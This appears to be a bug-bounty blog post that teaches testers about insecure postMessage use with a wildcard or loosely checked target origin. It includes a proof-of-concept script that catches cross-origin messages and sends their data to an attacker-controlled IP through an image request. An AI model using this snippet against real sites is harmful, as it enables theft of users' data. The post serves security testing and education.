Hey fam, i hope everyone is doing okay and able to use this time efficiently for self development and to self reflect. This corona virus pandemic has grown a bit tiring to be honest and gets the best of us.

Here is my attempt at helping you understand a bug often overlooked when checking webapps or mobile apps, making it a gold mine for all testers, whether seasoned or new.

Prerequisite: the site should rely on cookies

CASE 1, Message sent to all origin

First a little about postMessage, as descirbed in the mozilla documentation the syntax is fairly simple.

postMessage(message, targetOrigin, [transfer]);

The problem however occurs when the target origin is set to * aka everywhere or lets say to xyz.com but improper implentation allows one to bypass it by creating domain like _xyz.com_puter.com. As most of you must have guessed by now the data is not being restricted to the same origin(the original domain) and thus in theory can be leaked.

Lets take a closer look at how this can be achieved

<script>
window.addEventListener("message", function(event){
document.write("<img src='http://192.168.1.5:8000/?leak="+event.data.value+"'></img>");
}, false);
window.open("vulnerable page leaking data");
</script>

I know this must look kind of confusing at first look but stay with me:

Since the message is being sent to all origins, we should be able to catch it. So we created a malicious html page that has an event listener basically a kind of catcher that catches any data sent by post message.

#bugs #javascript #bug-bounty #web-development #hacking